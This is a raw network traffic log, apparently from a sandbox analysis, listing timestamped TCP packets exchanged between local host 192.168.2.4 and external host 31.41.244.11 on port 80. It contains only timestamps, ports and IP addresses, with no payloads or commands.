Jan 7, 2025 10:09:01.358150005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358160019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358182907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358192921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358200073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358234882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358354092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358362913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358371973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358381033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358423948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358428001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358428955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358468056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358484983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358495951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358505964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358515024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358525038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358551025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358551025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358576059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358584881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358611107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358622074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358623028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358623028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358632088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358648062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358688116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358688116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358702898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358712912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358721972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358789921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358870029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358900070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358915091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358923912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358932972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358942986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358947992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358952999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358963966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358988047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358988047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359024048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359044075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359052896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359061956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359071970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359086037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359097004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359107018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359112024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359118938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359133959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359164000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359164000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359179974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359189987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359200001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359214067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359222889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359241962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359258890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359268904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359292030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359293938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359302998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359349012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359349012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359400988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359411001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359420061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359430075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359452963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359468937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359481096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359515905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359515905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359515905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359527111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359565020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359600067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359605074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359611034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359620094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359628916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359638929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359673977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359680891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359680891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359711885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359721899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359751940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359751940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359769106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359791040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359802008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359812021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359821081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359841108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359842062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.359889030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359889030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.359991074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360001087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360009909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360043049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360047102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360058069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360066891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360093117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360115051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360126019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360163927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360163927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360234976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360424042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360435009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360461950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360471964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360502005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360517979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360529900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360537052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360537052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360557079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360567093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.360599995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360615969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.360768080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.361093044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.361103058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.361112118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.361123085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.361134052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.361145020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.361146927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.361155987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.361164093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.361207962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.361207962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392266989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392302036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392313957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392326117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392328024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392340899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392359018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392364979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392376900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392391920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392404079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392406940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392406940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392451048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392463923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392463923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392463923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392498970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392510891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392513037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392546892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392554045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392566919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392570019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392594099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392608881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392632961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392632961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392644882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392657042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392661095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392673969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392699003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392710924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392731905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392731905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392755032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392765045 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.392765999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.392826080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.418840885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.418860912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.418879032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.418890953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.418900967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.418908119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.418946028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.418956995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.418960094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.418967962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.418982983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.419004917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.419038057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.444873095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.444885015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.444895983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.444907904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.444960117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.444960117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.444973946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.444987059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445000887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445029974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445045948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445091963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445105076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445127010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445139885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445152998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445163965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445183992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445183039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445183039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445195913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445205927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445207119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445229053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445238113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445241928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445251942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445261955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445272923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445281982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445281982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445282936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445296049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445308924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445323944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445344925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445442915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445456982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445467949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445504904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445504904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445511103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445523024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445543051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445580006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445593119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445605993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445616961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445621014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445635080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445636034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445669889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445669889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445714951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445720911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445727110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445739031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445749998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445755959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445760012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445768118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445779085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445782900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445791006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445823908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445825100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445861101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445885897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445898056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445909023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445919037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445929050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445935011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445954084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445954084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.445955038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445967913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.445992947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446002960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446005106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446005106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446048021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446059942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446070910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446086884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446099043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446135998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446146011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446158886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446171045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446181059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446192980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446196079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446227074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446245909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446249008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446259022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446269989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446300983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446300983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446327925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446402073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446412086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446427107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446449995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446459055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446470022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446472883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446482897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446497917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446512938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446526051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446541071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446558952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446595907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446713924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446739912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446755886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446768999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446780920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446784019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446784019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446794033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446805000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446808100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446816921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.446819067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446850061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.446877003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447329044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447340965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447350979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447364092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447375059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447381020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447393894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447393894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447447062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447447062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.447714090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447731972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447743893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.447762966 CET	50017	80	192.168.2.4	31.41.244.11
